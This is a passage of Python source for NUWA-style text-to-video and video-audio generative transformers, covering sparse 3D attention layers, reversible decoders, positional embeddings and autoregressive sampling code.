q.shape[0], n = q.shape[2]), (self.null_k, self.null_v))\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n sim = einsum('b h n i d, b h n j d -> b h n i j', q, k)\n\n if exists(context_mask):\n max_neg_value = -torch.finfo(sim.dtype).max\n context_mask = rearrange(context_mask, 'b n c -> b 1 n 1 c')\n context_mask = F.pad(context_mask, (1, 0), value = True) # null key / value\n sim = sim.masked_fill(~context_mask, max_neg_value)\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.dropout(attn)\n\n attn = self.talking_heads(attn)\n\n out = einsum('b h n i j, b h n j d -> b h n i d', attn, v)\n out = rearrange(out, 'b h n c d -> b (n c) (h d)')\n out = self.to_out(out)\n\n # shift back to original sequence\n\n out = F.pad(out, (0, 0, seq_out_left_pad, seq_out_right_pad), value = 0.)\n\n # mask src 
sequence, if mask was passed in (extra insurance)\n\n if exists(mask):\n mask = rearrange(mask, '... -> ... 1')\n out = out.masked_fill(~mask, 0.)\n\n return out\n\n# transformer\n\nclass Transformer(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n causal = False,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n cross_attend = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n cross_2dna_attn = False,\n cross_2dna_image_size = None,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilations = (1,),\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n rotary_pos_emb = False\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n assert not (cross_2dna_attn and not exists(cross_2dna_image_size)), 'cross_2dna_image_size must be defined'\n\n self.layers = MList([])\n\n for ind in range(depth):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n dropout = attn_dropout\n )\n\n cross_attn = None\n\n if cross_attend:\n if cross_2dna_attn:\n dilation = cross_2dna_dilations[ind % len(cross_2dna_dilations)]\n\n cross_attn = SparseCross2DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout,\n image_size = cross_2dna_image_size,\n kernel_size = cross_2dna_kernel_size,\n dilation = dilation\n )\n\n else:\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n self_attn = ShiftVideoTokens(self_attn, image_size = fmap_size)\n ff = ShiftVideoTokens(ff, image_size = fmap_size)\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = self_attn),\n SandwichNorm(dim = dim, fn = cross_attn) if cross_attend else None,\n SandwichNorm(dim = dim, fn = ff)\n ]))\n\n self.norm = StableLayerNorm(dim)\n\n def forward(\n self,\n x,\n mask = None,\n context = None,\n context_mask = None\n ):\n for attn, cross_attn, ff in self.layers:\n x = attn(x, mask = mask) + x\n\n if exists(cross_attn):\n x = cross_attn(x, context = context, mask = mask, context_mask = context_mask) + x\n\n x = ff(x) + x\n\n return self.norm(x)\n\nclass ReversibleTransformer(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n causal = False,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n cross_attend = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n cross_2dna_attn = False,\n cross_2dna_image_size = None,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilations = (1,),\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n rotary_pos_emb = False\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not 
exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n assert not (cross_2dna_attn and not exists(cross_2dna_image_size)), 'cross_2dna_image_size must be defined'\n\n self.layers = MList([])\n\n for ind in range(depth):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n image_size = sparse_3dna_video_shape[-1]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n image_size = None\n\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n dropout = attn_dropout\n )\n\n wrapper_fn = partial(ShiftVideoTokens, image_size = image_size, shift_space = sparse_3dna_attn and shift_video_tokens)\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = wrapper_fn(self_attn)),\n SandwichNorm(dim = dim, fn = wrapper_fn(FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)))\n ]))\n\n if not cross_attend:\n continue\n\n if cross_2dna_attn:\n dilation = cross_2dna_dilations[ind % len(cross_2dna_dilations)]\n\n cross_attn = SparseCross2DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout,\n image_size = cross_2dna_image_size,\n kernel_size = cross_2dna_kernel_size,\n dilation = dilation\n )\n else:\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = cross_attn),\n SandwichNorm(dim = dim, fn = wrapper_fn(FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)))\n ]))\n\n attn_context_layer = ((True, False),) if cross_attend else tuple()\n route_attn = ((True, False), *attn_context_layer) * depth\n route_context = ((False, False), *attn_context_layer) * depth\n\n context_route_map = {'context': route_context, 'context_mask': route_context} if cross_attend else {}\n attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn}\n\n self.net = ReversibleSequence(self.layers, args_route = {**context_route_map, **attn_route_map})\n self.norm = StableLayerNorm(dim)\n\n def forward(\n self,\n x,\n **kwargs\n ):\n x = self.net(x, **kwargs)\n return self.norm(x)\n\n# dual modality decoder (for video and audio synthesis)\n\nclass DualModalityDecoder(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n\n self.layers = MList([])\n self.layer_types = []\n\n def intra_modality_attn(sparse_3dna_attn):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n 
query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n dropout = attn_dropout\n )\n\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n self_attn = ShiftVideoTokens(self_attn, image_size = fmap_size)\n ff = ShiftVideoTokens(ff, image_size = fmap_size)\n\n return MList([\n SandwichNorm(dim = dim, fn = self_attn),\n SandwichNorm(dim = dim, fn = cross_attn),\n SandwichNorm(dim = dim, fn = ff)\n ])\n\n def inter_modality_attn(chunk_size, context_chunk_size):\n cross_modality_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = chunk_size,\n context_chunk_size = context_chunk_size,\n has_start_token = True,\n context_has_start_token = True\n )\n\n cross_modality_ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n return MList([\n SandwichNorm(dim = dim, fn = cross_modality_attn),\n SandwichNorm(dim = dim, fn = cross_modality_ff),\n ])\n\n for ind in range(depth):\n video_modality_attn = intra_modality_attn(sparse_3dna_attn = sparse_3dna_attn)\n audio_modality_attn = intra_modality_attn(sparse_3dna_attn = False)\n\n self.layer_types.append('intra_modality')\n\n self.layers.append(MList([\n video_modality_attn,\n audio_modality_attn,\n ]))\n\n if ((ind + 1) % cross_modality_attn_every) == 0:\n self.layer_types.append('inter_modality')\n\n video_to_audio_attn = inter_modality_attn(num_video_tokens_per_frame, num_audio_tokens_per_video_frame)\n audio_to_video_attn = inter_modality_attn(num_audio_tokens_per_video_frame, num_video_tokens_per_frame)\n\n self.layers.append(MList([\n video_to_audio_attn,\n audio_to_video_attn\n ]))\n\n self.video_norm = StableLayerNorm(dim)\n self.audio_norm = StableLayerNorm(dim)\n\n def forward(\n self,\n video,\n audio,\n *,\n context,\n audio_mask = None,\n video_mask = None,\n context_mask = None,\n **kwargs\n ):\n for blocks, layer_type in zip(self.layers, self.layer_types):\n if layer_type == 'intra_modality':\n (video_self_attn, video_cross_attn, video_ff), (audio_self_attn, audio_cross_attn, audio_ff) = blocks\n\n video_ = video_self_attn(video, mask = video_mask) + video\n video_ = video_cross_attn(video_, context = context, mask = video_mask, context_mask = context_mask) + video_\n video_ = video_ff(video_) + video_\n\n audio_ = audio_self_attn(audio, mask = audio_mask) + audio\n audio_ = audio_cross_attn(audio_, context = context, mask = audio_mask, context_mask = context_mask) + audio_\n audio_ = audio_ff(audio_) + audio_\n\n elif layer_type == 'inter_modality':\n (video_to_audio_attn, video_ff), (audio_to_video_attn, audio_ff) = blocks\n\n video_ = video_to_audio_attn(\n video,\n context = audio,\n mask = video_mask,\n context_mask = audio_mask\n ) + video\n\n audio_ = audio_to_video_attn(\n audio,\n context = video,\n mask = audio_mask,\n context_mask = video_mask\n ) + audio\n\n video_ = video_ff(video_) + video_\n audio_ = audio_ff(audio_) + audio_\n else:\n raise ValueError(f'unknown layer type {layer_type}')\n\n video, audio = video_, audio_\n\n return self.video_norm(video), self.audio_norm(audio)\n\nclass ReversibleDualModalityDecoder(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n 
num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n\n self.layers = MList([])\n self.layer_types = []\n\n norm_wrapper = lambda fn: SandwichNorm(dim = dim, fn = fn)\n create_ff = lambda: FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n for ind in range(depth):\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n video_self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n\n audio_self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n dropout = attn_dropout\n )\n\n video_ff = create_ff()\n audio_ff = create_ff()\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n video_self_attn = ShiftVideoTokens(video_self_attn, image_size = fmap_size)\n video_ff = ShiftVideoTokens(video_ff, image_size = fmap_size)\n\n self.layers.append(MList([\n norm_wrapper(video_self_attn),\n norm_wrapper(video_ff),\n norm_wrapper(audio_self_attn),\n norm_wrapper(audio_ff)\n ]))\n\n self.layer_types.append('intra_modality_self_attn')\n\n video_cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n audio_cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n video_cross_ff = create_ff()\n audio_cross_ff = create_ff()\n\n self.layers.append(MList([\n norm_wrapper(video_cross_attn),\n norm_wrapper(video_cross_ff),\n norm_wrapper(audio_cross_attn),\n norm_wrapper(audio_cross_ff)\n ]))\n\n self.layer_types.append('intra_modality_cross_attn')\n\n if ((ind + 1) % cross_modality_attn_every) == 0:\n video_to_audio_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = num_video_tokens_per_frame,\n context_chunk_size = num_audio_tokens_per_video_frame,\n has_start_token = True,\n context_has_start_token = True\n )\n\n video_cross_modality_ff = create_ff()\n\n audio_to_video_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = num_audio_tokens_per_video_frame,\n context_chunk_size = num_video_tokens_per_frame,\n has_start_token = True,\n context_has_start_token = True\n )\n\n audio_cross_modality_ff = create_ff()\n\n self.layers.append(MList([\n video_to_audio_attn,\n video_cross_modality_ff,\n audio_to_video_attn,\n audio_cross_modality_ff\n ]))\n\n self.layer_types.append('inter_modality_cross_attn')\n\n self.net = DualModalityReversibleSequence(self.layers, self.layer_types)\n\n self.video_norm = StableLayerNorm(dim)\n self.audio_norm = StableLayerNorm(dim)\n\n def forward(\n self,\n video,\n audio,\n *,\n context,\n audio_mask = None,\n video_mask = None,\n context_mask = None,\n **kwargs\n ):\n video, audio = self.net(\n video,\n audio,\n context = context,\n audio_mask 
= audio_mask,\n video_mask = video_mask,\n context_mask = context_mask\n )\n\n return self.video_norm(video), self.audio_norm(audio)\n\n# embeddings\n\nclass Embedding(nn.Module):\n def __init__(self, *shape, frac_gradient = 1.):\n super().__init__()\n self.frac_gradient = frac_gradient\n self.embed = nn.Embedding(*shape)\n\n def forward(self, x):\n x = self.embed(x)\n\n if self.training and self.frac_gradient < 1:\n x = frac_gradient(x, self.frac_gradient)\n\n return x\n\n# positional embedding\n\nclass AxialPositionalEmbedding(nn.Module):\n def __init__(\n self,\n dim,\n *,\n shape\n ):\n super().__init__()\n self.dim = dim\n frames, height, width = shape\n self.pos_frames = nn.Parameter(torch.randn(frames, dim))\n self.pos_height = nn.Parameter(torch.randn(height, dim))\n self.pos_width = nn.Parameter(torch.randn(width, dim))\n\n def forward(self):\n pos_frames = rearrange(self.pos_frames, 'f d -> f 1 1 d')\n pos_height = rearrange(self.pos_height, 'h d -> 1 h 1 d')\n pos_width = rearrange(self.pos_width, 'w d -> 1 1 w d')\n positions = pos_frames + pos_height + pos_width\n return rearrange(positions, 'f h w d -> 1 (f h w) d')\n\n# sampling helpers\n\ndef top_k(logits, thres = 0.5):\n num_logits = logits.shape[-1]\n k = max(int((1 - thres) * num_logits), 1)\n val, ind = torch.topk(logits, k)\n probs = torch.full_like(logits, float('-inf'))\n probs.scatter_(1, ind, val)\n return probs\n\n# main class\n\nclass NUWA(nn.Module):\n def __init__(\n self,\n *,\n vae,\n dim,\n image_size,\n max_video_frames = 5,\n text_num_tokens,\n text_max_seq_len = 256,\n text_enc_depth = 6,\n text_enc_dim_head = 64,\n text_enc_heads = 8,\n text_rotary_pos_emb = True,\n enc_reversible = False,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n dec_reversible = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilation = 1,\n ):\n super().__init__()\n self.vae = vae\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.text_max_seq_len = text_max_seq_len\n self.text_embedding = Embedding(text_num_tokens, dim, frac_gradient = embed_gradient_frac)\n\n # positional embedding for text\n\n self.text_abs_pos_emb = Embedding(text_max_seq_len, dim) if not text_rotary_pos_emb else None\n self.text_rotary_pos_emb = RotaryEmbedding(dim = min(32, text_enc_dim_head)) if text_rotary_pos_emb else None\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.text_transformer = enc_transformer_klass(\n dim = dim,\n depth = text_enc_depth,\n heads = text_enc_heads,\n dim_head = text_enc_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n rotary_pos_emb = text_rotary_pos_emb\n )\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = (max_video_frames, fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # cycle dilation for sparse 3d-nearby attention\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n dec_transformer_klass = Transformer if not dec_reversible else 
ReversibleTransformer\n\n self.video_transformer = dec_transformer_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n causal = True,\n cross_attend = True,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_attn = True,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n\n self.to_logits = nn.Linear(dim, num_image_tokens)\n\n def embed_text(self, text, mask = None):\n batch, seq_len, device = *text.shape, text.device\n assert seq_len <= self.text_max_seq_len, 'your input text has a greater length than what was designated on initialization'\n\n tokens = self.text_embedding(text)\n\n if exists(self.text_abs_pos_emb):\n pos_emb = self.text_abs_pos_emb(torch.arange(seq_len, device = device))\n tokens = tokens + rearrange(pos_emb, 'n d -> 1 n d')\n\n rotary_pos_emb = None\n if exists(self.text_rotary_pos_emb):\n rotary_pos_emb = self.text_rotary_pos_emb(seq_len, device = device)\n\n return self.text_transformer(\n tokens,\n mask = mask,\n rotary_pos_emb = rotary_pos_emb\n )\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n text,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, seq_len, device = *text.shape, text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_tokens_per_frame = self.video_fmap_size ** 2\n\n num_frames = default(num_frames, self.max_video_frames)\n total_video_tokens = num_tokens_per_frame * num_frames\n max_video_tokens = num_tokens_per_frame * self.max_video_frames\n\n pos_emb = self.video_pos_emb()\n\n for ind in range(total_video_tokens):\n video_indices_input = video_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > max_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = torch.zeros_like(text_mask).bool()\n )\n\n uncond_logits = self.to_logits(uncond_frame_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n video_indices = torch.cat((video_indices, sample), dim = 1)\n\n codes = self.vae.codebook[video_indices]\n codes = 
rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n return video\n\n def forward(\n self,\n *,\n text,\n video = None,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n batch, seq_len, frames, device = *text.shape, video.shape[1], text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... -> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n text_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if not return_loss:\n return logits\n\n loss = F.cross_entropy(rearrange(logits, 'b n c -> b c n'), frame_indices)\n return loss\n\n# generating video and audio\n\nclass NUWAVideoAudio(nn.Module):\n def __init__(\n self,\n *,\n vae,\n dim,\n image_size,\n num_audio_tokens,\n num_audio_tokens_per_video_frame,\n max_video_frames = 5,\n text_num_tokens,\n text_max_seq_len = 256,\n text_enc_depth = 6,\n text_enc_dim_head = 64,\n text_enc_heads = 8,\n text_rotary_pos_emb = False,\n enc_reversible = False,\n dec_reversible = True,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilation = 1,\n audio_loss_weight = 1.,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n self.vae = vae\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.text_max_seq_len = text_max_seq_len\n self.text_embedding = Embedding(text_num_tokens, dim, frac_gradient = embed_gradient_frac)\n\n self.text_abs_pos_emb = Embedding(text_max_seq_len, dim) if not text_rotary_pos_emb else None\n self.text_rotary_pos_emb = RotaryEmbedding(dim = min(32, text_enc_dim_head)) if text_rotary_pos_emb else None\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.text_transformer = enc_transformer_klass(\n dim = dim,\n depth = text_enc_depth,\n heads = text_enc_heads,\n dim_head = text_enc_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout\n )\n\n # video related params\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = (max_video_frames, 
fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # audio related params\n\n self.audio_bos = nn.Parameter(torch.randn(dim))\n self.audio_embedding = Embedding(num_audio_tokens, dim, frac_gradient = embed_gradient_frac)\n\n max_audio_seq_len = num_audio_tokens_per_video_frame * max_video_frames\n self.audio_pos_emb = nn.Embedding(max_audio_seq_len, dim)\n\n self.audio_loss_weight = audio_loss_weight\n\n # num tokens per video frame\n\n self.num_video_tokens_per_frame = fmap_size ** 2\n self.num_audio_tokens_per_video_frame = num_audio_tokens_per_video_frame\n\n # cycle dilation for sparse 3d-nearby attention\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n decoder_klass = ReversibleDualModalityDecoder if dec_reversible else DualModalityDecoder\n\n self.video_audio_transformer = decoder_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_attn = True,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n num_audio_tokens_per_video_frame = num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame = fmap_size * fmap_size,\n cross_modality_attn_every = cross_modality_attn_every\n )\n\n self.to_video_logits = nn.Linear(dim, num_image_tokens)\n self.to_audio_logits = nn.Linear(dim, num_audio_tokens)\n\n def embed_text(self, text, mask = None):\n batch, seq_len, device = *text.shape, text.device\n assert seq_len <= self.text_max_seq_len, 'your input text has a greater length than what was designated on initialization'\n\n tokens = self.text_embedding(text)\n\n if exists(self.text_abs_pos_emb):\n pos_emb = self.text_abs_pos_emb(torch.arange(seq_len, device = device))\n tokens = tokens + rearrange(pos_emb, 'n d -> 1 n d')\n\n rotary_pos_emb = None\n if exists(self.text_rotary_pos_emb):\n rotary_pos_emb = self.text_rotary_pos_emb(seq_len, device = device)\n\n return self.text_transformer(\n tokens,\n mask = mask,\n rotary_pos_emb = rotary_pos_emb\n )\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n text,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, seq_len, device = *text.shape, text.device\n num_tokens_per_frame, num_audio_tokens_per_video_frame = self.num_video_tokens_per_frame, self.num_audio_tokens_per_video_frame\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n video_bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n audio_bos = repeat(self.audio_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n audio_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_frames = default(num_frames, self.max_video_frames)\n\n total_video_tokens = num_frames * num_tokens_per_frame\n total_audio_tokens = num_frames * num_audio_tokens_per_video_frame\n\n video_pos_emb = self.video_pos_emb()\n\n is_decoding_video = True # toggle to False to decode audio, alternating between video and audio\n\n while video_indices.shape[1] < total_video_tokens \\\n or audio_indices.shape[1] < 
total_audio_tokens:\n\n video_indices_input = video_indices\n audio_indices_input = audio_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > total_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n # prep video embeddings\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = video_pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((video_bos, frame_embeddings), dim = 1)\n\n # prep audio embeddings\n\n audio_embeddings = self.audio_embedding(audio_indices_input)\n audio_pos_emb = self.audio_pos_emb(torch.arange(audio_embeddings.shape[1], device = device))\n audio_pos_emb = rearrange(audio_pos_emb, 'n d -> 1 n d')\n audio_embeddings = audio_embeddings + audio_pos_emb\n audio_embeddings = torch.cat((audio_bos, audio_embeddings), dim = 1)\n\n frame_embeddings, audio_embeddings = self.video_audio_transformer(\n 